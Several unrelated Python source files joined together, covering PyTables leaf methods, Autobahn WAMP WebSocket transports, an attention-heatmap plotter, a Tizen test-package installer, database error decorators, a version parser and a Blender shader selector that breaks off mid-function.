# place where we have to do the conversion manually. In all the
# other cases, HDF5 will be responsible for doing the
# byteswap properly.
if dbyteorder in ['little', 'big']:
if dbyteorder != self.byteorder:
# if data is not writeable, do a copy first
if not data.flags.writeable:
data = data.copy()
data.byteswap(True)
else:
# Fix the byteorder again, no matter which byteorder the user
# specified in the constructor.
self.byteorder = "irrelevant"
return data
def _pointSelection(self, key):
"""Perform a point-wise selection.
`key` can be any of the following items:
* A boolean array with the same shape as self. Those positions
with True values will signal the coordinates to be returned.
* A numpy array (or list or tuple) with the point coordinates.
This has to be a two-dimensional array of size len(self.shape)
by num_elements containing a list of zero-based values
specifying the coordinates in the dataset of the selected
elements. The order of the element coordinates in the array
specifies the order in which the array elements are iterated
through when I/O is performed. Duplicate coordinate locations
are not checked for.
Return the coordinates array. If this is not possible, raise a
`TypeError` so that the next selection method can be tried out.
This is useful for any `Leaf` instance implementing a
point-wise selection.
"""
if type(key) in (list, tuple):
if isinstance(key, tuple) and len(key) > len(self.shape):
raise IndexError("Invalid index or slice: %r" % (key,))
# Try to convert key to a numpy array. If not possible,
# a TypeError will be issued (to be caught later on).
try:
key = numpy.array(key)
except ValueError:
raise TypeError("Invalid index or slice: %r" % (key,))
elif not isinstance(key, numpy.ndarray):
raise TypeError("Invalid index or slice: %r" % (key,))
# Protection against empty keys
if len(key) == 0:
return numpy.array([], dtype="i8")
if key.dtype.kind == 'b':
if not key.shape == self.shape:
raise IndexError(
"Boolean indexing array has incompatible shape")
# Get the True coordinates (64-bit indices!)
coords = numpy.asarray(key.nonzero(), dtype='i8')
coords = numpy.transpose(coords)
elif key.dtype.kind == 'i':
if len(key.shape) > 2:
raise IndexError(
"Coordinate indexing array has incompatible shape")
elif len(key.shape) == 2:
if key.shape[0] != len(self.shape):
raise IndexError(
"Coordinate indexing array has incompatible shape")
coords = numpy.asarray(key, dtype="i8")
coords = numpy.transpose(coords)
else:
# For 1-dimensional datasets
coords = numpy.asarray(key, dtype="i8")
else:
raise TypeError("Only integer coordinates allowed.")
# We absolutely need a contiguous array
if not coords.flags.contiguous:
coords = coords.copy()
return coords
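# Illustrative keys accepted by _pointSelection() above (shapes follow the
# docstring; the concrete leaf and values are hypothetical):
#
#   leaf[numpy.array([True, False, True])]      # boolean mask, same shape as leaf
#   leaf[[1, 3, 7]]                             # coordinates for a 1-D dataset
#   leaf[numpy.array([[0, 1, 2], [3, 4, 5]])]   # len(shape) x npoints coordinates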
# Public methods
# ~~~~~~~~~~~~~~
# Tree manipulation
# `````````````````
def remove(self):
"""Remove this node from the hierarchy.
This method has the behavior described
in :meth:`Node._f_remove`. Please note that there is no recursive flag
since leaves do not have child nodes.
"""
self._f_remove(False)
def rename(self, newname):
"""Rename this node in place.
This method has the behavior described in :meth:`Node._f_rename()`.
"""
self._f_rename(newname)
def move( self, newparent=None, newname=None,
overwrite=False, createparents=False ):
"""Move or rename this node.
This method has the behavior described in :meth:`Node._f_move`
"""
self._f_move(newparent, newname, overwrite, createparents)
def copy( self, newparent=None, newname=None,
overwrite=False, createparents=False, **kwargs ):
"""Copy this node and return the new one.
This method has the behavior described in :meth:`Node._f_copy`. Please
note that there is no recursive flag since leaves do not have child
nodes.
.. warning::
Note that unknown parameters passed to this method will be
ignored, so you may want to double-check the spelling of these
(i.e. if you write them incorrectly, they will most probably
be ignored).
Parameters
----------
title
The new title for the destination. If omitted or None, the original
title is used.
filters : Filters
Specifying this parameter overrides the original filter properties
in the source node. If specified, it must be an instance of the
Filters class (see :ref:`FiltersClassDescr`). The default is to
copy the filter properties from the source node.
copyuserattrs
You can prevent the user attributes from being copied by setting
this parameter to False. The default is to copy them.
start, stop, step : int
Specify the range of rows to be copied; the default is to copy all
the rows.
stats
This argument may be used to collect statistics on the copy
process. When used, it should be a dictionary with keys 'groups',
'leaves' and 'bytes' having a numeric value. Their values will be
incremented to reflect the number of groups, leaves and bytes,
respectively, that have been copied during the operation.
chunkshape
The chunkshape of the new leaf. It supports a couple of special
values. A value of keep means that the chunkshape will be the same
as in the original leaf (this is the default). A value of auto means
that a new shape will be computed automatically in order to ensure
best performance when accessing the dataset through the main
dimension. Any other value should be an integer or a tuple
matching the dimensions of the leaf.
"""
return self._f_copy(
newparent, newname, overwrite, createparents, **kwargs )
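# Hedged usage sketch for copy(); the destination group and names are
# hypothetical:
#
#   newleaf = leaf.copy(fileh.root.backup, 'data_copy',
#                       chunkshape='auto', copyuserattrs=False)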
def truncate(self, size):
"""Truncate the main dimension to be size rows.
If the main dimension previously was larger than this size, the extra
data is lost. If the main dimension previously was shorter, it is
extended, and the extended part is filled with the default values.
The truncation operation can only be applied to *enlargeable* datasets,
else a TypeError will be raised.
"""
# A non-enlargeable arrays (Array, CArray) cannot be truncated
if self.extdim < 0:
raise TypeError("non-enlargeable datasets cannot be truncated")
self._g_truncate(size)
def isVisible(self):
"""Is this node visible?
This method has the behavior described in :meth:`Node._f_isVisible()`.
"""
return self._f_isVisible()
# Attribute handling
# ``````````````````
def getAttr(self, name):
"""Get a PyTables attribute from this node.
This method has the behavior described in :meth:`Node._f_getAttr`.
"""
return self._f_getAttr(name)
def setAttr(self, name, value):
"""Set a PyTables attribute for this node.
This method has the behavior described in :meth:`Node._f_setAttr()`.
"""
self._f_setAttr(name, value)
def delAttr(self, name):
"""Delete a PyTables attribute from this node.
This method has the behavior described in :meth:`Node._f_delAttr`.
"""
self._f_delAttr(name)
# Data handling
# `````````````
def flush(self):
"""Flush pending data to disk.
Saves whatever remaining buffered data to disk. It also releases I/O
buffers, so if you are filling many datasets in the same PyTables
session, please call flush() regularly to help PyTables keep
memory requirements low.
"""
self._g_flush()
def _f_close(self, flush=True):
"""Close this node in the tree.
This method has the behavior described in :meth:`Node._f_close`.
Besides that, the optional argument flush tells whether to flush
pending data to disk or not before closing.
"""
if not self._v_isopen:
return # the node is already closed or not initialized
# Only do a flush in case the leaf has an IO buffer. The
# internal buffers of HDF5 will be flushed afterwards during the
# self._g_close() call. Avoiding an unnecessary flush()
# operation accelerates the closing for the unbuffered leaves.
if flush and hasattr(self, "_v_iobuf"):
self.flush()
# Close the dataset and release resources
self._g_close()
# Close myself as a node.
super(Leaf, self)._f_close()
def close(self, flush=True):
"""Close this node in the tree.
This method is completely equivalent to :meth:`Leaf._f_close`.
"""
self._f_close(flush)
## Local Variables:
## mode: python
## py-indent-offset: 4
## tab-width: 4
## fill-column: 72
## End:
|
###############################################################################
##
## Copyright (C) 2013-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from __future__ import absolute_import
__all__ = ['WampWebSocketServerProtocol',
           'WampWebSocketClientProtocol',
           'WampWebSocketServerFactory',
           'WampWebSocketClientFactory']
from zope.interface import implementer
from twisted.python import log
from autobahn.websocket import protocol
from autobahn.websocket import http
from autobahn.wamp.interfaces import ITransport
from autobahn.wamp.exception import ProtocolError, SerializationError, TransportLost
@implementer(ITransport)
class WampWebSocketProtocol:
"""
Base class for WAMP-over-WebSocket transport mixins.
"""
def _bailout(self, code, reason=None):
if self.debug:
log.msg("Failing WAMP-over-WebSocket transport: code = {}, reason = '{}'".format(code, reason))
self.failConnection(code, reason)
def onOpen(self):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onOpen`
"""
## WebSocket connection established. Now let the user WAMP session factory
## create a new WAMP session and fire off session open callback.
try:
self._session = self.factory._factory()
self._session.onOpen(self)
except Exception as e:
## Exceptions raised in onOpen are fatal ..
reason = "WAMP Internal Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_INTERNAL_ERROR, reason = reason)
def onClose(self, wasClean, code, reason):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onClose`
"""
## WebSocket connection lost - fire off the WAMP
## session close callback
try:
if self.debug:
log.msg("WAMP-over-WebSocket transport lost: wasClean = {}, code = {}, reason = '{}'".format(wasClean, code, reason))
self._session.onClose(wasClean)
except Exception as e:
## silently ignore exceptions raised here ..
pass
self._session = None
def onMessage(self, payload, isBinary):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onMessage`
"""
try:
msg = self._serializer.unserialize(payload, isBinary)
self._session.onMessage(msg)
except ProtocolError as e:
reason = "WAMP Protocol Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason = reason)
except Exception as e:
reason = "WAMP Internal Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_INTERNAL_ERROR, reason = reason)
def send(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.send`
"""
if self.isOpen():
try:
bytes, isBinary = self._serializer.serialize(msg)
except Exception as e:
## all exceptions raised from above should be serialization errors ..
raise SerializationError("Unable to serialize WAMP application payload ({})".format(e))
else:
self.sendMessage(bytes, isBinary)
else:
raise TransportLost()
def isOpen(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.isOpen`
"""
return self._session is not None
def close(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.close`
"""
if self.isOpen():
self.sendClose(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL)
else:
raise TransportLost()
def abort(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.abort`
"""
if self.isOpen():
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_GOING_AWAY)
else:
raise TransportLost()
def parseSubprotocolIdentifier(subprotocol):
try:
s = subprotocol.split('.')
if s[0] != "wamp":
raise Exception("invalid protocol %s" % s[0])
version = int(s[1])
serializerId = s[2]
return version, serializerId
except:
return None, None
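# Examples of the subprotocol naming scheme parsed above:
#
#   parseSubprotocolIdentifier("wamp.2.json")    -> (2, "json")
#   parseSubprotocolIdentifier("wamp.2.msgpack") -> (2, "msgpack")
#   parseSubprotocolIdentifier("bogus")          -> (None, None)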
class WampWebSocketServerProtocol(WampWebSocketProtocol):
"""
Mixin for WAMP-over-WebSocket server transports.
"""
STRICT_PROTOCOL_NEGOTIATION = True
def onConnect(self, request):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onConnect`
"""
headers = {}
for subprotocol in request.protocols:
version, serializerId = parseSubprotocolIdentifier(subprotocol)
if version == 2 and serializerId in self.factory._serializers.keys():
self._serializer = self.factory._serializers[serializerId]
return subprotocol, headers
if self.STRICT_PROTOCOL_NEGOTIATION:
raise http.HttpException(http.BAD_REQUEST[0], "This server only speaks WebSocket subprotocols %s" % ', '.join(self.factory.protocols))
else:
## assume wamp.2.json
self._serializer = self.factory._serializers['json']
return None, headers
class WampWebSocketClientProtocol(WampWebSocketProtocol):
"""
Mixin for WAMP-over-WebSocket client transports.
"""
STRICT_PROTOCOL_NEGOTIATION = True
def onConnect(self, response):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onConnect`
"""
if response.protocol not in self.factory.protocols:
if self.STRICT_PROTOCOL_NEGOTIATION:
raise Exception("Server does not speak any of the WebSocket subprotocols we requested (%s)." % ', '.join(self.factory.protocols))
else:
## assume wamp.2.json
serializerId = 'json'
else:
version, serializerId = parseSubprotocolIdentifier(response.protocol)
self._serializer = self.factory._serializers[serializerId]
class WampWebSocketFactory:
"""
Base class for WAMP-over-WebSocket transport factory mixins.
"""
def __init__(self, factory, serializers = None):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializers: A list of WAMP serializers to use (or None for default
serializers). Serializers must implement
:class:`autobahn.wamp.interfaces.ISerializer`.
:type serializers: list
"""
assert(callable(factory))
self._factory = factory
if serializers is None:
serializers = []
## try MsgPack WAMP serializer
try:
from autobahn.wamp.serializer import MsgPackSerializer
serializers.append(MsgPackSerializer())
except ImportError:
pass
## try JSON WAMP serializer
try:
from autobahn.wamp.serializer import JsonSerializer
serializers.append(JsonSerializer())
except ImportError:
pass
if not serializers:
raise Exception("could not import any WAMP serializers")
self._serializers = {}
for ser in serializers:
self._serializers[ser.SERIALIZER_ID] = ser
self._protocols = ["wamp.2.%s" % ser.SERIALIZER_ID for ser in serializers]
class WampWebSocketServerFactory(WampWebSocketFactory):
"""
Mixin for WAMP-over-WebSocket server transport factories.
"""
class WampWebSocketClientFactory(WampWebSocketFactory):
"""
Mixin for WAMP-over-WebSocket client transport factories.
"""
|
import numpy
import matplotlib.pyplot as plt
import sys
import json
import argparse
# input:
# alignment matrix - numpy array
# shape (target tokens + eos, number of hidden source states = source tokens + eos)
# one line corresponds to one decoding step producing one target token
# each line has the attention model weights corresponding to that decoding step
# each float on a line is the attention model weight for a corresponding source state.
# plot: a heat map of the alignment matrix
# x axis are the source tokens (alignment is to source hidden state that roughly corresponds to a source token)
# y axis are the target tokens
# http://stackoverflow.com/questions/14391959/heatmap-in-matplotlib-with-pcolor
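# Illustrative header line of the text format parsed by read_alignment_matrix()
# below: '|||'-separated fields where field 0 is the sentence id, field 1 the
# target sentence, field 3 the source sentence, and the last field holds
# "src_count trg_count" (the middle field is not used here); the sentences
# are hypothetical:
#
#   0 ||| a house ||| 0.0 ||| ein Haus ||| 3 3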
def plot_head_map(mma, target_labels, source_labels):
fig, ax = plt.subplots()
heatmap = ax.pcolor(mma, cmap=plt.cm.Blues)
# put the major ticks at the middle of each cell
ax.set_xticks(numpy.arange(mma.shape[1])+0.5, minor=False)
ax.set_yticks(numpy.arange(mma.shape[0])+0.5, minor=False)
# without this I get some extra columns/rows
# http://stackoverflow.com/questions/31601351/why-does-this-matplotlib-heatmap-have-an-extra-blank-column
ax.set_xlim(0, int(mma.shape[1]))
ax.set_ylim(0, int(mma.shape[0]))
# want a more natural, table-like display
ax.invert_yaxis()
ax.xaxis.tick_top()
# source words -> column labels
ax.set_xticklabels(source_labels, minor=False)
# target words -> row labels
ax.set_yticklabels(target_labels, minor=False)
plt.xticks(rotation=45)
#plt.tight_layout()
plt.show()
# column labels -> target words
# row labels -> source words
def read_alignment_matrix(f):
header = f.readline().strip().split('|||')
if header[0] == '':
return None, None, None, None
sid = int(header[0].strip())
# number of tokens in source and translation +1 for eos
src_count, trg_count = map(int,header[-1].split())
# source words
source_labels = header[3].decode('UTF-8').split()
source_labels.append('</s>')
# target words
target_labels = header[1].decode('UTF-8').split()
target_labels.append('</s>')
mm = []
for r in range(trg_count):
alignment = map(float,f.readline().strip().split())
mm.append(alignment)
mma = numpy.array(mm)
return sid,mma, target_labels, source_labels
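# Hypothetical example of the text format parsed above (fields are separated
# by '|||'; field 2 is not used by this parser):
#   0 ||| ein Haus ||| 0.0 ||| a house ||| 3 3
# would yield sid=0, target tokens ['ein', 'Haus', '</s>'], source tokens
# ['a', 'house', '</s>'], and a 3x3 matrix read from the next 3 lines.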
def read_plot_alignment_matrices(f, n):
while(f):
sid, mma, target_labels, source_labels = read_alignment_matrix(f)
if mma is None:
return
if sid >n:
return
plot_head_map(mma, target_labels, source_labels)
# empty line separating the matrices
f.readline()
"""
Adding functions to read the json format.
"""
def read_plot_alignment_json(file, n):
while (file):
sid, mma, target_labels, source_labels = read_alignment_json(file)
if mma is None:
return
if sid > n:
return
plot_head_map(mma, target_labels, source_labels)
def read_alignment_json(file):
data = file.readline() ##one line containing the json object.
if len(data.strip()) == 0:
return None, None, None, None
jdata = json.loads(data)
## messy json encodings... TODO: make this better
jdata = json.loads(json.dumps(jdata).decode('unicode-escape').encode('utf8'))
#print jdata
sid = int(jdata["id"])
mma = numpy.array(jdata["matrix"])
##target words
target_labels = jdata["target_sent"].split()
target_labels.append('</s>')
##source words
source_labels = jdata["source_sent"].split()
source_labels.append('</s>')
return sid,mma, target_labels, source_labels
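# Hypothetical example of one JSON line accepted by read_alignment_json
# (only the keys actually read above are shown):
#   {"id": 0, "source_sent": "a house", "target_sent": "ein Haus",
#    "matrix": [[0.9, 0.05, 0.05], [0.1, 0.8, 0.1], [0.1, 0.1, 0.8]]}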
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# '/Users/mnadejde/Documents/workspace/MTMA2016/models/wmt16_systems/en-de/test.alignment'
parser.add_argument('--input', '-i', type=argparse.FileType('r'),
default='/Users/mnadejde/Documents/workspace/MTMA2016/models/wmt16_systems/ro-en/newstest2016-roen-src.ro.alignment', metavar='PATH',
help="Input file (default: standard input)")
parser.add_argument('--json', '-j', required = False,action="store_true",
help="If this option is used, then read alignment matrix from a Json formatted file.")
args = parser.parse_args()
if args.json:
read_plot_alignment_json(args.input, 10) ##n is the maximum number of sentences to process.
else:
read_plot_alignment_matrices(args.input,10)
|
#!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = "/home/app/content"
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
def doCMD(cmd):
    # No need to handle timeouts in this short script; let the calling tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code != None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
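# Illustrative note (values are hypothetical): for a command containing
# "pkgcmd", updateCMD wraps it so it runs as the test user with the session
# bus address exported, e.g.
#   su - app -c 'export DBUS_SESSION_BUS_ADDRESS=...;pkgcmd -l'
# Any other command is returned unchanged.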
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user )
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
pkg_infos = line.split()
if len(pkg_infos) == 4:
continue
name = pkg_infos[5]
name = name.lstrip('[').rstrip(']')
print "name is: %s" % name
if pkg_name == name:
test_pkg_id = pkg_infos[3]
test_pkg_id = test_pkg_id.lstrip('[').rstrip(']')
print test_pkg_id
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
    # return True on success so callers can use "if not doRemoteCopy(...)"
    if return_code != 0:
        return False
    else:
        return True
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith(".wgt"):
continue
elif item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
#if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
for item in glob.glob("%s/xmlhttprequest/w3c/resources/cgi/*" % SCRIPT_DIR):
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/xmlhttprequest/w3c/resources/%s" % (PKG_SRC_DIR, item_name)):
#if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception, e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0 :
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket"%str(userid)
else:
print "[Error] cmd commands error : %s"%str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
|
import re
from gnue.common.apps.errors import UserError
class ErrorDecorators(object):
def decorateValueRequiredError(self, error, match):
return UserError(u_("The field '%s' is required. Please fill the field and try again") % match.groups()[0])
def decorateForceRollbackAndRetry(self, error, match):
print "! rollback forced via server error"
self.rollback()
return None # means to retry
def decorateSyntaxError(self, error, match):
return error
def decorateInternalError(self, error, match):
try:
s = match.groups()[0].decode('UTF-8')
except:
try:
s = match.groups()[0].decode('cp1251')
except:
s = repr(match.groups()[0])
return UserError(s)
def decorateUniqueConstraint(self, error, match):
return UserError(u_("Value already exists. Duplicate key value violates unique constraint '%s'") % match.groups()[0])
ERROR_DECORATORS = (
(
re.compile(r'IntegrityError\: null value in column \"(\w+)\" violates not\-null constraint'),
decorateValueRequiredError
),
(
re.compile(r'(?:ProgrammingError|InternalError)\: current transaction is aborted, commands ignored until end of transaction block'),
decorateForceRollbackAndRetry
),
(
re.compile(r'duplicate key value violates unique constraint "(\w+)"'),
decorateUniqueConstraint
),
#(
# re.compile(r'ProgrammingError\: syntax error at or near (.*)'),
# decorateSyntaxError
#),
(
re.compile(r'InternalError\: (.*)'),
decorateInternalError
),
)
def decorateError(self, error):
"""
        This function is used to make database-related errors user friendly
"""
for pattern, decoratorFn in self.ERROR_DECORATORS:
match = pattern.search('%s: %s' % (error.__class__.__name__, str(error)))
if match:
error = decoratorFn(self, error, match)
break
return error
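# A small sketch of how the patterns above are applied (the error text is
# hypothetical and assumes this module imports, i.e. the gnue package is
# available).  decorateError probes the string "<ClassName>: <message>".
def _example_match_not_null():
    sample = 'IntegrityError: null value in column "name" violates not-null constraint'
    pattern = ErrorDecorators.ERROR_DECORATORS[0][0]
    return pattern.search(sample).groups()[0]   # -> 'name'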
|
import re
def parse_version(version):
"""
Simplistic parser for setuptools_scm versions.
Supports final versions and alpha ('a'), beta ('b') and release candidate ('rc') versions.
It does not try to parse anything else than that, even if there is more in the version string.
Output is a version tuple containing integers. It ends with one or two elements that ensure that relational
operators yield correct relations for alpha, beta and rc versions, too.
For final versions the last element is a -1.
    For prerelease versions the last two elements are a smaller negative number (encoding alpha/beta/rc) and the prerelease number itself (e.g. the beta number).
    This version format is part of the remote protocol; don't change it in breaking ways.
"""
version_re = r"""
(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+) # version, e.g. 1.2.33
(?P<prerelease>(?P<ptype>a|b|rc)(?P<pnum>\d+))? # optional prerelease, e.g. a1 or b2 or rc33
"""
m = re.match(version_re, version, re.VERBOSE)
if m is None:
raise ValueError('Invalid version string %s' % version)
gd = m.groupdict()
version = [int(gd['major']), int(gd['minor']), int(gd['patch'])]
if m.lastgroup == 'prerelease':
p_type = {'a': -4, 'b': -3, 'rc': -2}[gd['ptype']]
p_num = int(gd['pnum'])
version += [p_type, p_num]
else:
version += [-1]
return tuple(version)
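# Worked examples for the tuple encoding described in the docstring above
# (illustrative helper, not part of the original module):
def _example_parse_version():
    assert parse_version('1.2.3') == (1, 2, 3, -1)
    assert parse_version('1.2.3a1') == (1, 2, 3, -4, 1)
    assert parse_version('1.2.3rc4') == (1, 2, 3, -2, 4)
    # prereleases compare below the corresponding final release
    assert parse_version('1.2.3rc4') < parse_version('1.2.3')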
def format_version(version):
"""a reverse for parse_version (obviously without the dropped information)"""
f = []
it = iter(version)
while True:
part = next(it)
if part >= 0:
            f.append(str(part))  # append the whole number, not its individual digits
elif part == -1:
break
else:
f[-1] = f[-1] + {-2: 'rc', -3: 'b', -4: 'a'}[part] + str(next(it))
break
return '.'.join(f)
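# Round-trip sketch for the two helpers above (illustrative only):
#   format_version((1, 2, 3, -1))    -> '1.2.3'
#   format_version((1, 2, 3, -2, 4)) -> '1.2.3rc4'
# so format_version(parse_version(s)) == s whenever s consists only of the
# parts that parse_version actually parses.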
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2015-2021: SCS Software
def get_shader(effect):
"""Gets class which represents shader for given effect inside "eut2" modules.
:param effect: full shader name without "eut2." prefix
:type effect: str
:return: corresponding class for given shader effect
:rtype: class
"""
if effect == "none":
from io_scs_tools.internals.shaders.eut2.none import NNone as Shader
elif effect == "water":
from io_scs_tools.internals.shaders.eut2.water import Water as Shader
elif effect == "window.lit":
from io_scs_tools.internals.shaders.eut2.window.lit import WindowLit as Shader
elif effect == "reflective":
from io_scs_tools.internals.shaders.eut2.reflective import Reflective as Shader
elif effect == "sign":
from io_scs_tools.internals.shaders.eut2.sign import Sign as Shader
elif effect == "grass":
from io_scs_tools.internals.shaders.eut2.grass import Grass as Shader
elif effect == "glass":
from io_scs_tools.internals.shaders.eut2.glass import Glass as Shader
elif effect == "mlaaweight":
from io_scs_tools.internals.shaders.eut2.mlaaweight import MlaaWeight as Shader
elif effect.startswith("fakeshadow"):
from io_scs_tools.internals.shaders.eut2.fakeshadow import Fakeshadow as Shader
elif effect.startswith("shadowonly"):
from io_scs_tools.internals.shaders.eut2.shadowonly import Shadowonly as Shader
elif effect.startswith("lightmap.night"):
from io_scs_tools.internals.shaders.eut2.lightmap.night import LightMapNight as Shader
elif effect.startswith("light.tex"):
from io_scs_tools.internals.shaders.eut2.light_tex import LightTex as Shader
elif effect.startswith("retroreflective"):
from io_scs_tools.internals.shaders.eut2.retroreflective import Retroreflective as Shader
elif effect.startswith("unlit.tex"):
from io_scs_tools.internals.shaders.eut2.unlit_tex import UnlitTex as Shader
elif effect.startswith("unlit.vcol.tex"):
from io_scs_tools.internals.shaders.eut2.unlit_vcol_tex import UnlitVcolTex as Shader
elif effect.startswith("truckpaint"):
if ".airbrush" in effect:
from io_scs_tools.internals.shaders.eut2.truckpaint.airbrush import TruckpaintAirbrush as Shader
elif ".colormask" in effect:
from io_scs_tools.internals.shaders.eut2.truckpaint.colormask import TruckpaintColormask as Shader
else:
from io_scs_tools.internals.shaders.eut2.truckpaint import Truckpaint as Shader
elif effect.startswith("lamp"):
if ".add.env" in effect:
from io_scs_tools.internals.shaders.eut2.lamp.add_env import LampAddEnv as Shader
else:
from io_scs_tools.internals.shaders.eut2.lamp import Lamp as Shader
elif effect.startswith("sky"):
from io_scs_tools.internals.shaders.eut2.sky import Sky as Shader
elif effect.startswith("shadowmap"):
